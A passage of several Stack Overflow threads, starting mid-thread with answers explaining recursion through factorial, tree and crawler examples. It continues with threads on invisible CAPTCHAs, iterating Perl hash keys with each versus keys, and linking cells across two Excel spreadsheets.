*the stack is rewound to its previous position
*control jumps back to where the function was called
Doing all of these steps takes time, usually a little bit more than it takes to iterate through a loop. However, the real problem is in step #1. When many programs start, they allocate a single chunk of memory for their stack, and when they run out of that memory (often, but not always due to recursion), the program crashes due to a stack overflow.
So in these languages recursion is slower and it makes you vulnerable to crashing. There are still some arguments for using it though. In general, code written recursively is shorter and a bit more elegant, once you know how to read it.
There is a technique that language implementers can use called tail call optimization which can eliminate some classes of stack overflow. Put succinctly: if a function's return expression is simply the result of a function call, then you don't need to add a new level onto the stack, you can reuse the current one for the function being called. Regrettably, few imperative language-implementations have tail-call optimization built in.
* I love recursion. My favorite static language doesn't use loops at all, recursion is the only way to do something repeatedly. I just don't think that recursion is generally a good idea in languages that aren't tuned for it.
** By the way Mario, the typical name for your ArrangeString function is "join", and I'd be surprised if your language of choice doesn't already have an implementation of it.
A: *
*A function that calls itself
*When a function can be (easily) decomposed into a simple operation plus the same function on some smaller portion of the problem. I should say, rather, that this makes it a good candidate for recursion.
*They do!
The canonical example is the factorial which looks like:
int fact(int a)
{
if(a==1)
return 1;
return a*fact(a-1);
}
In general, recursion isn't necessarily fast (function call overhead tends to be high because recursive functions tend to be small, see above) and can suffer from some problems (stack overflow anyone?). Some say they tend to be hard to get 'right' in non-trivial cases but I don't really buy into that. In some situations, recursion makes the most sense and is the most elegant and clear way to write a particular function. It should be noted that some languages favor recursive solutions and optimize them much more (LISP comes to mind).
A: Simple english example of recursion.
A child couldn't sleep, so her mother told her a story about a little frog,
who couldn't sleep, so the frog's mother told her a story about a little bear,
who couldn't sleep, so the bear's mother told her a story about a little weasel...
who fell asleep.
...and the little bear fell asleep;
...and the little frog fell asleep;
...and the child fell asleep.
A: A recursive function is one which calls itself. The most common reason I've found to use it is traversing a tree structure. For example, if I have a TreeView with checkboxes (think installation of a new program, "choose features to install" page), I might want a "check all" button which would be something like this (pseudocode):
function cmdCheckAllClick {
checkRecursively(TreeView1.RootNode);
}
function checkRecursively(Node n) {
n.Checked = True;
foreach ( n.Children as child ) {
checkRecursively(child);
}
}
So you can see that the checkRecursively first checks the node which it is passed, then calls itself for each of that node's children.
You do need to be a bit careful with recursion. If you get into an infinite recursive loop, you will get a Stack Overflow exception :)
I can't think of a reason why people shouldn't use it, when appropriate. It is useful in some circumstances, and not in others.
I think that because it's an interesting technique, some coders perhaps end up using it more often than they should, without real justification. This has given recursion a bad name in some circles.
A: Recursion is an expression directly or indirectly referencing itself.
Consider recursive acronyms as a simple example:
*
*GNU stands for GNU's Not Unix
*PHP stands for PHP: Hypertext Preprocessor
*YAML stands for YAML Ain't Markup Language
*WINE stands for Wine Is Not an Emulator
*VISA stands for Visa International Service Association
More examples on Wikipedia
A: In the most basic computer science sense, recursion is a function that calls itself. Say you have a linked list structure:
struct Node {
Node* next;
};
And you want to find out how long a linked list is you can do this with recursion:
int length(const Node* list) {
if (!list->next) {
return 1;
} else {
return 1 + length(list->next);
}
}
(This could of course be done with a for loop as well, but is useful as an illustration of the concept)
A: Whenever a function calls itself, creating a loop, then that's recursion. As with anything there are good uses and bad uses for recursion.
The most simple example is tail recursion where the very last line of the function is a call to itself:
int FloorByTen(int num)
{
if (num % 10 == 0)
return num;
else
return FloorByTen(num-1);
}
However, this is a lame, almost pointless example because it can easily be replaced by more efficient iteration. After all, recursion suffers from function call overhead, which in the example above could be substantial compared to the operation inside the function itself.
So the whole reason to do recursion rather than iteration should be to take advantage of the call stack to do some clever stuff. For example, if you call a function multiple times with different parameters inside the same loop then that's a way to accomplish branching. A classic example is the Sierpinski triangle.
You can draw one of those very simply with recursion, where the call stack branches in 3 directions:
private void BuildVertices(double x, double y, double len)
{
if (len > 0.002)
{
mesh.Positions.Add(new Point3D(x, y + len, -len));
mesh.Positions.Add(new Point3D(x - len, y - len, -len));
mesh.Positions.Add(new Point3D(x + len, y - len, -len));
len *= 0.5;
BuildVertices(x, y + len, len);
BuildVertices(x - len, y - len, len);
BuildVertices(x + len, y - len, len);
}
}
If you attempt to do the same thing with iteration I think you'll find it takes a lot more code to accomplish.
Other common use cases might include traversing hierarchies, e.g. website crawlers, directory comparisons, etc.
Conclusion
In practical terms, recursion makes the most sense whenever you need iterative branching.
A: Recursion works best with what I like to call "fractal problems", where you're dealing with a big thing that's made of smaller versions of that big thing, each of which is an even smaller version of the big thing, and so on. If you ever have to traverse or search through something like a tree or nested identical structures, you've got a problem that might be a good candidate for recursion.
People avoid recursion for a number of reasons:
*
*Most people (myself included) cut their programming teeth on procedural or object-oriented programming as opposed to functional programming. To such people, the iterative approach (typically using loops) feels more natural.
*Those of us who cut our programming teeth on procedural or object-oriented programming have often been told to avoid recursion because it's error prone.
*We're often told that recursion is slow. Calling and returning from a routine repeatedly involves a lot of stack pushing and popping, which is slower than looping. I think some languages handle this better than others, and those languages are most likely not those where the dominant paradigm is procedural or object-oriented.
*For at least a couple of programming languages I've used, I remember hearing recommendations not to use recursion if it gets beyond a certain depth because its stack isn't that deep.
A: Here's a simple example: how many elements in a set. (there are better ways to count things, but this is a nice simple recursive example.)
First, we need two rules:
*
*if the set is empty, the count of items in the set is zero (duh!).
*if the set is not empty, the count is one plus the number of items in the set after one item is removed.
Suppose you have a set like this: [x x x]. let's count how many items there are.
*
*the set is [x x x] which is not empty, so we apply rule 2. the number of items is one plus the number of items in [x x] (i.e. we removed an item).
*the set is [x x], so we apply rule 2 again: one + number of items in [x].
*the set is [x], which still matches rule 2: one + number of items in [].
*Now the set is [], which matches rule 1: the count is zero!
*Now that we know the answer in step 4 (0), we can solve step 3 (1 + 0)
*Likewise, now that we know the answer in step 3 (1), we can solve step 2 (1 + 1)
*And finally now that we know the answer in step 2 (2), we can solve step 1 (1 + 2) and get the count of items in [x x x], which is 3. Hooray!
We can represent this as:
count of [x x x] = 1 + count of [x x]
= 1 + (1 + count of [x])
= 1 + (1 + (1 + count of []))
= 1 + (1 + (1 + 0)))
= 1 + (1 + (1))
= 1 + (2)
= 3
When applying a recursive solution, you usually have at least 2 rules:
*
*the basis, the simple case which states what happens when you have "used up" all of your data. This is usually some variation of "if you are out of data to process, your answer is X"
*the recursive rule, which states what happens if you still have data. This is usually some kind of rule that says "do something to make your data set smaller, and reapply your rules to the smaller data set."
If we translate the above to pseudocode, we get:
numberOfItems(set)
if set is empty
return 0
else
remove 1 item from set
return 1 + numberOfItems(set)
There's a lot more useful examples (traversing a tree, for example) which I'm sure other people will cover.
A: I like this definition:
In recursion, a routine solves a small part of a problem itself, divides the problem into smaller pieces, and then calls itself to solve each of the smaller pieces.
I also like Steve McConnells discussion of recursion in Code Complete where he criticises the examples used in Computer Science books on Recursion.
Don't use recursion for factorials or Fibonacci numbers
One problem with
computer-science textbooks is that
they present silly examples of
recursion. The typical examples are
computing a factorial or computing a
Fibonacci sequence. Recursion is a
powerful tool, and it's really dumb to
use it in either of those cases. If a
programmer who worked for me used
recursion to compute a factorial, I'd
hire someone else.
I thought this was a very interesting point to raise and may be a reason why recursion is often misunderstood.
EDIT:
This was not a dig at Dav's answer - I had not seen that reply when I posted this
A: A recursive statement is one in which you define the process of what to do next as a combination of the inputs and what you have already done.
For example, take factorial:
factorial(6) = 6*5*4*3*2*1
But it's easy to see factorial(6) also is:
6 * factorial(5) = 6*(5*4*3*2*1).
So generally:
factorial(n) = n*factorial(n-1)
Of course, the tricky thing about recursion is that if you want to define things in terms of what you have already done, there needs to be some place to start.
In this example, we just make a special case by defining factorial(1) = 1.
Now we see it from the bottom up:
factorial(6) = 6*factorial(5)
= 6*5*factorial(4)
= 6*5*4*factorial(3) = 6*5*4*3*factorial(2) = 6*5*4*3*2*factorial(1) = 6*5*4*3*2*1
Since we defined factorial(1) = 1, we reach the "bottom".
Generally speaking, recursive procedures have two parts:
1) The recursive part, which defines some procedure in terms of new inputs combined with what you've "already done" via the same procedure. (i.e. factorial(n) = n*factorial(n-1))
2) A base part, which makes sure that the process doesn't repeat forever by giving it some place to start (i.e. factorial(1) = 1)
It can be a bit confusing to get your head around at first, but just look at a bunch of examples and it should all come together. If you want a much deeper understanding of the concept, study mathematical induction. Also, be aware that some languages optimize for recursive calls while others do not. It's pretty easy to make insanely slow recursive functions if you're not careful, but there are also techniques to make them performant in most cases.
Hope this helps...
A: 1.)
A method is recursive if it can call itself; either directly:
void f() {
... f() ...
}
or indirectly:
void f() {
... g() ...
}
void g() {
... f() ...
}
2.) When to use recursion
Q: Does using recursion usually make your code faster?
A: No.
Q: Does using recursion usually use less memory?
A: No.
Q: Then why use recursion?
A: It sometimes makes your code much simpler!
3.) People use recursion only when it is very complex to write iterative code. For example, tree traversal techniques like preorder, postorder can be made both iterative and recursive. But usually we use recursive because of its simplicity.
A: Well, that's a pretty decent definition you have. And wikipedia has a good definition too. So I'll add another (probably worse) definition for you.
When people refer to "recursion", they're usually talking about a function they've written which calls itself repeatedly until it is done with its work. Recursion can be helpful when traversing hierarchies in data structures.
A: An example: A recursive definition of a staircase is:
A staircase consists of:
- a single step and a staircase (recursion)
- or only a single step (termination)
A: Recursion is a method of solving problems based on the divide and conquer mentality.
The basic idea is that you take the original problem and divide it into smaller (more easily solved) instances of itself, solve those smaller instances (usually by using the same algorithm again) and then reassemble them into the final solution.
The canonical example is a routine to generate the Factorial of n. The Factorial of n is calculated by multiplying all of the numbers between 1 and n. An iterative solution in C# looks like this:
public int Fact(int n)
{
int fact = 1;
for( int i = 2; i <= n; i++)
{
fact = fact * i;
}
return fact;
}
There's nothing surprising about the iterative solution and it should make sense to anyone familiar with C#.
The recursive solution is found by recognising that the nth Factorial is n * Fact(n-1). Or to put it another way, if you know what a particular Factorial number is you can calculate the next one. Here is the recursive solution in C#:
public int FactRec(int n)
{
if( n < 2 )
{
return 1;
}
return n * FactRec( n - 1 );
}
The first part of this function is known as a Base Case (or sometimes Guard Clause) and is what prevents the algorithm from running forever. It just returns the value 1 whenever the function is called with a value of 1 or less. The second part is more interesting and is known as the Recursive Step. Here we call the same method with a slightly modified parameter (we decrement it by 1) and then multiply the result with our copy of n.
When first encountered this can be kind of confusing so it's instructive to examine how it works when run. Imagine that we call FactRec(5). We enter the routine, are not picked up by the base case and so we end up like this:
// In FactRec(5)
return 5 * FactRec( 5 - 1 );
// which is
return 5 * FactRec(4);
If we re-enter the method with the parameter 4 we are again not stopped by the guard clause and so we end up at:
// In FactRec(4)
return 4 * FactRec(3);
If we substitute this return value into the return value above we get
// In FactRec(5)
return 5 * (4 * FactRec(3));
This should give you a clue as to how the final solution is arrived at so we'll fast track and show each step on the way down:
return 5 * (4 * FactRec(3));
return 5 * (4 * (3 * FactRec(2)));
return 5 * (4 * (3 * (2 * FactRec(1))));
return 5 * (4 * (3 * (2 * (1))));
That final substitution happens when the base case is triggered. At this point we have a simple algrebraic formula to solve which equates directly to the definition of Factorials in the first place.
It's instructive to note that every call into the method results in either a base case being triggered or a call to the same method where the parameters are closer to a base case (often called a recursive call). If this is not the case then the method will run forever.
A: To recurse on a solved problem: do nothing, you're done.
To recurse on an open problem: do the next step, then recurse on the rest.
A: In plain English:
Assume you can do 3 things:
*
*Take one apple
*Write down tally marks
*Count tally marks
You have a lot of apples in front of you on a table and you want to know how many apples there are.
start
Is the table empty?
yes: Count the tally marks and cheer like it's your birthday!
no: Take 1 apple and put it aside
Write down a tally mark
goto start
The process of repeating the same thing till you are done is called recursion.
I hope this is the "plain english" answer you are looking for!
A: A recursive function is a function that contains a call to itself. A recursive struct is a struct that contains an instance of itself. You can combine the two as a recursive class. The key part of a recursive item is that it contains an instance/call of itself.
Consider two mirrors facing each other. We've seen the neat infinity effect they make. Each reflection is an instance of a mirror, which is contained within another instance of a mirror, etc. The mirror containing a reflection of itself is recursion.
A binary search tree is a good programming example of recursion. The structure is recursive with each Node containing 2 instances of a Node. Functions to work on a binary search tree are also recursive.
A: This is an old question, but I want to add an answer from logistical point of view (i.e not from algorithm correctness point of view or performance point of view).
I use Java for work, and Java doesn't support nested function. As such, if I want to do recursion, I might have to define an external function (which exists only because my code bumps against Java's bureaucratic rule), or I might have to refactor the code altogether (which I really hate to do).
Thus, I often avoid recursion, and use stack operation instead, because recursion itself is essentially a stack operation.
A: Recursion is solving a problem with a function that calls itself. A good example of this is a factorial function. Factorial is a math problem where factorial of 5, for example, is 5 * 4 * 3 * 2 * 1. This function solves this in C# for positive integers (not tested - there may be a bug).
public int Factorial(int n)
{
if (n <= 1)
return 1;
return n * Factorial(n - 1);
}
A: You want to use it anytime you have a tree structure. It is very useful in reading XML.
A: Recursion as it applies to programming is basically calling a function from inside its own definition (inside itself), with different parameters so as to accomplish a task.
A: "If I have a hammer, make everything look like a nail."
Recursion is a problem-solving strategy for huge problems, where at every step just, "turn 2 small things into one bigger thing," each time with the same hammer.
Example
Suppose your desk is covered with a disorganized mess of 1024 papers. How do you make one neat, clean stack of papers from the mess, using recursion?
*
*Divide: Spread all the sheets out, so you have just one sheet in each "stack".
*Conquer:
*Go around, putting each sheet on top of one other sheet. You now have stacks of 2.
*Go around, putting each 2-stack on top of another 2-stack. You now have stacks of 4.
*Go around, putting each 4-stack on top of another 4-stack. You now have stacks of 8.
*... on and on ...
*You now have one huge stack of 1024 sheets!
Notice that this is pretty intuitive, aside from counting everything (which isn't strictly necessary). You might not go all the way down to 1-sheet stacks, in reality, but you could and it would still work. The important part is the hammer: With your arms, you can always put one stack on top of the other to make a bigger stack, and it doesn't matter (within reason) how big either stack is.
A: its a way to do things over and over indefinitely such that every option is used.
for example if you wanted to get all the links on an html page you will want to have recursions because when you get all the links on page 1 you will want to get all the links on each of the links found on the first page. then for each link to a newpage you will want those links and so on... in other words it is a function that calls itself from inside itself.
when you do this you need a way to know when to stop or else you will be in an endless loop so you add an integer param to the function to track the number of cycles.
in c# you will have something like this:
private void findlinks(string URL, int reccursiveCycleNumb) {
if (reccursiveCycleNumb == 0)
{
return;
}
//recursive action here
foreach (LinkItem i in LinkFinder.Find(URL))
{
//see what links are being caught...
lblResults.Text += i.Href + "<BR>";
findlinks(i.Href, reccursiveCycleNumb - 1);
}
reccursiveCycleNumb -= reccursiveCycleNumb;
}
A: Recursion is the process where a method call iself to be able to perform a certain task. It reduces redundency of code. Most recurssive functions or methods must have a condifiton to break the recussive call i.e. stop it from calling itself if a condition is met - this prevents the creating of an infinite loop. Not all functions are suited to be used recursively.
A: In plain English, recursion means to repeat someting again and again.
In programming one example is of calling the function within itself .
Look on the following example of calculating factorial of a number:
public int fact(int n)
{
if (n==0) return 1;
else return n*fact(n-1)
}
A: hey, sorry if my opinion agrees with someone, I'm just trying to explain recursion in plain english.
suppose you have three managers - Jack, John and Morgan.
Jack manages 2 programmers, John - 3, and Morgan - 5.
you are going to give every manager 300$ and want to know what would it cost.
The answer is obvious - but what if 2 of Morgan-s employees are also managers?
HERE comes the recursion.
you start from the top of the hierarchy. the summery cost is 0$.
you start with Jack,
Then check if he has any managers as employees. if you find any of them are, check if they have any managers as employees and so on. Add 300$ to the summery cost every time you find a manager.
when you are finished with Jack, go to John, his employees and then to Morgan.
You'll never know, how much cycles will you go before getting an answer, though you know how many managers you have and how many Budget can you spend.
Recursion is a tree, with branches and leaves, called parents and children respectively.
When you use a recursion algorithm, you more or less consciously are building a tree from the data.
A: Any algorithm exhibits structural recursion on a datatype if basically consists of a switch-statement with a case for each case of the datatype.
for example, when you are working on a type
tree = null
| leaf(value:integer)
| node(left: tree, right:tree)
a structural recursive algorithm would have the form
function computeSomething(x : tree) =
if x is null: base case
if x is leaf: do something with x.value
if x is node: do something with x.left,
do something with x.right,
combine the results
this is really the most obvious way to write any algorith that works on a data structure.
now, when you look at the integers (well, the natural numbers) as defined using the Peano axioms
integer = 0 | succ(integer)
you see that a structural recursive algorithm on integers looks like this
function computeSomething(x : integer) =
if x is 0 : base case
if x is succ(prev) : do something with prev
the too-well-known factorial function is about the most trivial example of
this form.
A: function call itself or use its own definition.
A: Recursion in computing is a technique used to compute a result or side effect following the normal return from a single function (method, procedure or block) invocation.
The recursive function, by definition must have the ability to invoke itself either directly or indirectly (through other functions) depending on an exit condition or conditions not being met. If an exit condition is met the particular invocation returns to it's caller. This continues until the initial invocation is returned from, at which time the desired result or side effect will be available.
As an example, here's a function to perform the Quicksort algorithm in Scala (copied from the Wikipedia entry for Scala)
def qsort: List[Int] => List[Int] = {
case Nil => Nil
case pivot :: tail =>
val (smaller, rest) = tail.partition(_ < pivot)
qsort(smaller) ::: pivot :: qsort(rest)
}
In this case the exit condition is an empty list.
A: Recursion is technique of defining a function, a set or an algorithm in terms of itself.
For example
n! = n(n-1)(n-2)(n-3)...........*3*2*1
Now it can be defined recursively as:-
n! = n(n-1)! for n>=1
In programming terms, when a function or method calls itself repeatedly, until some specific condition gets satisfied, this process is called Recursion. But there must be a terminating condition and function or method must no enter into an infinite loop.
A: A great many problems can be thought of in two types of pieces:
*
*Base cases, which are elementary things that you can solve by just looking at them, and
*Recursive cases, which build a bigger problem out of smaller pieces (elementary or otherwise).
So what's a recursive function? Well, that's where you have a function that is defined in terms of itself, directly or indirectly. OK, that sounds ridiculous until you realize that it is sensible for the problems of the kind described above: you solve the base cases directly and deal with the recursive cases by using recursive calls to solve the smaller pieces of the problem embedded within.
The truly classic example of where you need recursion (or something that smells very much like it) is when you're dealing with a tree. The leaves of the tree are the base case, and the branches are the recursive case. (In pseudo-C.)
struct Tree {
int leaf;
Tree *leftBranch;
Tree *rightBranch;
};
The simplest way of printing this out in order is to use recursion:
function printTreeInOrder(Tree *tree) {
if (tree->leftBranch) {
printTreeInOrder(tree->leftBranch);
}
print(tree->leaf);
if (tree->rightBranch) {
printTreeInOrder(tree->rightBranch);
}
}
It's dead easy to see that that's going to work, since it's crystal clear. (The non-recursive equivalent is quite a lot more complex, requiring a stack structure internally to manage the list of things to process.) Well, assuming that nobody's done a circular connection of course.
Mathematically, the trick to showing that recursion is tamed is to focus on finding a metric for the size of the arguments. For our tree example, the easiest metric is the maximum depth of the tree below the current node. At leaves, it's zero. At a branch with only leaves below it, it's one, etc. Then you can simply show that there's strictly ordered sequence on the size of the arguments that the function is invoked on in order to process the tree; the arguments to the recursive calls are always "lesser" in the sense of the metric than the argument to the overall call. With a strictly decreasing cardinal metric, you're sorted.
It's also possible to have infinite recursion. That's messy and in many languages won't work because the stack blows up. (Where it does work, the language engine must be determining that the function somehow doesn't return and is able therefore to optimize away the keeping of the stack. Tricky stuff in general; tail-recursion is just the most trivial way of doing this.)
A: Recursion is when you have an operation that uses itself. It probably will have a stopping point, otherwise it would go on forever.
Let's say you want to look up a word in the dictionary. You have an operation called "look-up" at your disposal.
Your friend says "I could really spoon up some pudding right now!" You don't know what he means, so you look up "spoon" in the dictionary, and it reads something like this:
Spoon: noun - a utensil with a round scoop at the end.
Spoon: verb - to use a spoon on something
Spoon: verb - to cuddle closely from behind
Now, being that you're really not good with English, this points you in the right direction, but you need more info. So you select "utensil" and "cuddle" to look up for some more information.
Cuddle: verb - to snuggle
Utensil: noun - a tool, often an eating utensil
Hey! You know what snuggling is, and it has nothing to do with pudding. You also know that pudding is something you eat, so it makes sense now. Your friend must want to eat pudding with a spoon.
Okay, okay, this was a very lame example, but it illustrates (perhaps poorly) the two main parts of recursion.
1) It uses itself. In this example, you haven't really looked up a word meaningfully until you understand it, and that might mean looking up more words. This brings us to point two,
2) It stops somewhere. It has to have some kind of base-case. Otherwise, you'd just end up looking up every word in the dictionary, which probably isn't too useful. Our base-case was that you got enough information to make a connection between what you previously did and did not understand.
The traditional example that's given is factorial, where 5 factorial is 1*2*3*4*5 (which is 120). The base case would be 0 (or 1, depending). So, for any whole number n, you do the following
is n equal to 0? return 1
otherwise, return n * (factorial of n-1)
let's do this with the example of 4 (which we know ahead of time is 1*2*3*4 = 24).
factorial of 4 ... is it 0? no, so it must be 4 * factorial of 3
but what's factorial of 3? it's 3 * factorial of 2
factorial of 2 is 2 * factorial of 1
factorial of 1 is 1 * factorial of 0
and we KNOW factorial of 0! :-D it's 1, that's the definition
factorial of 1 is 1 * factorial of 0, which was 1... so 1*1 = 1
factorial of 2 is 2 * factorial of 1, which was 1... so 2*1 = 2
factorial of 3 is 3 * factorial of 2, which was 2... so 3*2 = 6
factorial of 4 (finally!!) is 4 * factorial of 3, which was 6... 4*6 is 24
Factorial is a simple case of "base case, and uses itself".
Now, notice we were still working on factorial of 4 the entire way down... If we wanted factorial of 100, we'd have to go all the way down to 0... which might have a lot of overhead to it. In the same manner, if we find an obscure word to look up in the dictionary, it might take looking up other words and scanning for context clues until we find a connection we're familiar with. Recursive methods can take a long time to work their way through. However, when they're used correctly, and understood, they can make complicated work surprisingly simple.
A: The simplest definition of recursion is "self-reference". A function that refers to itself, i. e. calls itself is recursive. The most important thing to keep in mind, is that a recursive function must have a "base case", i. e. a condition that if true causes it not to call itself, and thus terminate the recursion. Otherwise you will have infinite recursion:
recursion http://cart.kolix.de/wp-content/uploads/2009/12/infinite-recursion.jpg
A: I have created a recursive function to concatenate a list of strings with a separator between them. I use it mostly to create SQL expressions, by passing a list of fields as the 'items' and a 'comma+space' as the separator. Here's the function (It uses some Borland Builder native data types, but can be adapted to fit any other environment):
String ArrangeString(TStringList* items, int position, String separator)
{
String result;
result = items->Strings[position];
if (position <= items->Count)
result += separator + ArrangeString(items, position + 1, separator);
return result;
}
I call it this way:
String columnsList;
columnsList = ArrangeString(columns, 0, ", ");
Imagine you have an array named 'fields' with this data inside it: 'albumName', 'releaseDate', 'labelId'. Then you call the function:
ArrangeString(fields, 0, ", ");
As the function starts to work, the variable 'result' receives the value of the position 0 of the array, which is 'albumName'.
Then it checks if the position it's dealing with is the last one. As it isn't, then it concatenates the result with the separator and the result of a function, which, oh God, is this same function. But this time, check it out, it call itself adding 1 to the position.
ArrangeString(fields, 1, ", ");
It keeps repeating, creating a LIFO pile, until it reaches a point where the position being dealt with IS the last one, so the function returns only the item on that position on the list, not concatenating anymore. Then the pile is concatenated backwards.
Got it? If you don't, I have another way to explain it. :o)
A: I use recursion. What does that have to do with having a CS degree... (which I don't, by the way)
Common uses I have found:
*
*sitemaps - recurse through filesystem starting at document root
*spiders - crawling through a website to find email address, links, etc.
*?
A: Mario, I don't understand why you used recursion for that example.. Why not simply loop through each entry? Something like this:
String ArrangeString(TStringList* items, String separator)
{
String result = items->Strings[0];
for (int position=1; position < items->count; position++) {
result += separator + items->Strings[position];
}
return result;
}
The above method would be faster, and is simpler. There's no need to use recursion in place of a simple loop. I think these sorts of examples is why recursion gets a bad rap. Even the canonical factorial function example is better implemented with a loop.
A: Actually the better recursive solution for factorial should be:
int factorial_accumulate(int n, int accum) {
return (n < 2 ? accum : factorial_accumulate(n - 1, n * accum));
}
int factorial(int n) {
return factorial_accumulate(n, 1);
}
Because this version is Tail Recursive
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3021",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "121"
} |
Q: Is there an Unobtrusive Captcha for web forms? What is the best unobtrusive CAPTCHA for web forms? One that does not involve a UI, rather a non-UI Turing test. I have seen a simple example of a non UI CAPTCHA like the Nobot control from Microsoft. I am looking for a CAPTCHA that does not ask the user any question in any form. No riddles, no what's in this image.
A: I think you might be alluding to an "invisible" captcha. Check out the Subkismet project for an invisible captcha implementation.
http://www.codeplex.com/subkismet
A: Try akismet from wp guys
A: I think asking the user simple questions like:
"How many legs does a dog have?"
Would be much more effective that any CAPTCHA systems out there at the moment. Not only is it very difficult for the computer to answer that question, but it is very easy for a human to answer!
A: Eric Meyer implemented a very similar thing as a WordPress plugin called WP-GateKeeper that asks human-readable questions like "What colour is an orange?". He did have some issues around asking questions that a non-native English speaker would be able to answer simply, though.
There are a few posts on his blog about it.
A: @KP
After your update to the original question, the only real option available to you is to do some jiggery-pokery in Javascript on the client. The only issue with that would be provicing graceful degredation for non-javascript enabled clients.
e.g. You could add some AJAX-y goodness that reads a hidden form filed value, requests a verification key from the server, and sends that back along with the response, but that will never be populated if javascript is blocked/disabled. You could always implement a more traditional captcha type interface which could be disabled by javascript, and ignored by the server if the scripted field if filled in...
Depends how far you want to go with it, though. Good luck
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3027",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: What's the safest way to iterate through the keys of a Perl hash? If I have a Perl hash with a bunch of (key, value) pairs, what is the preferred method of iterating through all the keys? I have heard that using each may in some way have unintended side effects. So, is that true, and is one of the two following methods best, or is there a better way?
# Method 1
while (my ($key, $value) = each(%hash)) {
# Something
}
# Method 2
foreach my $key (keys(%hash)) {
# Something
}
A: A few miscellaneous thoughts on this topic:
*
*There is nothing unsafe about any of the hash iterators themselves. What is unsafe is modifying the keys of a hash while you're iterating over it. (It's perfectly safe to modify the values.) The only potential side-effect I can think of is that values returns aliases which means that modifying them will modify the contents of the hash. This is by design but may not be what you want in some circumstances.
*John's accepted answer is good with one exception: the documentation is clear that it is not safe to add keys while iterating over a hash. It may work for some data sets but will fail for others depending on the hash order.
*As already noted, it is safe to delete the last key returned by each. This is not true for keys as each is an iterator while keys returns a list.
A: One thing you should be aware of when using each is that it has
the side effect of adding "state" to your hash (the hash has to remember
what the "next" key is). When using code like the snippets posted above,
which iterate over the whole hash in one go, this is usually not a
problem. However, you will run into hard to track down problems (I speak from
experience ;), when using each together with statements like
last or return to exit from the while ... each loop before you
have processed all keys.
In this case, the hash will remember which keys it has already returned, and
when you use each on it the next time (maybe in a totaly unrelated piece of
code), it will continue at this position.
Example:
my %hash = ( foo => 1, bar => 2, baz => 3, quux => 4 );
# find key 'baz'
while ( my ($k, $v) = each %hash ) {
print "found key $k\n";
last if $k eq 'baz'; # found it!
}
# later ...
print "the hash contains:\n";
# iterate over all keys:
while ( my ($k, $v) = each %hash ) {
print "$k => $v\n";
}
This prints:
found key bar
found key baz
the hash contains:
quux => 4
foo => 1
What happened to keys "bar" and baz"? They're still there, but the
second each starts where the first one left off, and stops when it reaches the end of the hash, so we never see them in the second loop.
A: I may get bitten by this one but I think that it's personal preference. I can't find any reference in the docs to each() being different than keys() or values() (other than the obvious "they return different things" answer. In fact the docs state the use the same iterator and they all return actual list values instead of copies of them, and that modifying the hash while iterating over it using any call is bad.
All that said, I almost always use keys() because to me it is usually more self documenting to access the key's value via the hash itself. I occasionally use values() when the value is a reference to a large structure and the key to the hash was already stored in the structure, at which point the key is redundant and I don't need it. I think I've used each() 2 times in 10 years of Perl programming and it was probably the wrong choice both times =)
A: I always use method 2 as well. The only benefit of using each is if you're just reading (rather than re-assigning) the value of the hash entry, you're not constantly de-referencing the hash.
A: The rule of thumb is to use the function most suited to your needs.
If you just want the keys and do not plan to ever read any of the values, use keys():
foreach my $key (keys %hash) { ... }
If you just want the values, use values():
foreach my $val (values %hash) { ... }
If you need the keys and the values, use each():
keys %hash; # reset the internal iterator so a prior each() doesn't affect the loop
while(my($k, $v) = each %hash) { ... }
If you plan to change the keys of the hash in any way except for deleting the current key during the iteration, then you must not use each(). For example, this code to create a new set of uppercase keys with doubled values works fine using keys():
%h = (a => 1, b => 2);
foreach my $k (keys %h)
{
$h{uc $k} = $h{$k} * 2;
}
producing the expected resulting hash:
(a => 1, A => 2, b => 2, B => 4)
But using each() to do the same thing:
%h = (a => 1, b => 2);
keys %h;
while(my($k, $v) = each %h)
{
$h{uc $k} = $h{$k} * 2; # BAD IDEA!
}
produces incorrect results in hard-to-predict ways. For example:
(a => 1, A => 2, b => 2, B => 8)
This, however, is safe:
keys %h;
while(my($k, $v) = each %h)
{
if(...)
{
delete $h{$k}; # This is safe
}
}
All of this is described in the perl documentation:
% perldoc -f keys
% perldoc -f each
A: The place where each can cause you problems is that it's a true, non-scoped iterator. By way of example:
while ( my ($key,$val) = each %a_hash ) {
print "$key => $val\n";
last if $val; #exits loop when $val is true
}
# but "each" hasn't reset!!
while ( my ($key,$val) = each %a_hash ) {
# continues where the last loop left off
print "$key => $val\n";
}
If you need to be sure that each gets all the keys and values, you need to make sure you use keys or values first (as that resets the iterator). See the documentation for each.
A: I usually use keys and I can't think of the last time I used or read a use of each.
Don't forget about map, depending on what you're doing in the loop!
map { print "$_ => $hash{$_}\n" } keys %hash;
A: Using the each syntax will prevent the entire set of keys from being generated at once. This can be important if you're using a tie-ed hash to a database with millions of rows. You don't want to generate the entire list of keys all at once and exhaust your physical memory. In this case each serves as an iterator whereas keys actually generates the entire array before the loop starts.
So, the only place "each" is of real use is when the hash is very large (compared to the memory available). That is only likely to happen when the hash itself doesn't live in memory itself unless you're programming a handheld data collection device or something with small memory.
If memory is not an issue, usually the map or keys paradigm is the more prevelant and easier to read paradigm.
A: I woudl say:
*
*Use whatever's easiest to read/understand for most people (so keys, usually, I'd argue)
*Use whatever you decide consistently throught the whole code base.
This give 2 major advantages:
*
*It's easier to spot "common" code so you can re-factor into functions/methiods.
*It's easier for future developers to maintain.
I don't think it's more expensive to use keys over each, so no need for two different constructs for the same thing in your code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3033",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "119"
} |
Q: Linking two Office documents Problem:
I have two spreadsheets that each serve different purposes but contain one particular piece of data that needs to be the same in both spreadsheets. This piece of data (one of the columns) gets updated in spreadsheet A but needs to also be updated in spreadsheet B.
Goal:
A solution that would somehow link these two spreadsheets together (keep in mind that they exist on two separate LAN shares on the network) so that when A is updated, B is automatically updated for the corresponding record.
*Note that I understand fully that a database would probably be a better plan for tasks such as these but unfortunately I have no say in that matter.
**Note also that this needs to work for Office 2003 and Office 2007
A: So you mean that AD743 on spreadsheet B must be equal to AD743 on spreadsheet A? Try this:
*
*Open both spreadsheets on the same
machine.
*Go to AD743 on spreadsheet B.
*Type =.
*Go to spreadsheed A and click on
AD743.
*Press enter.
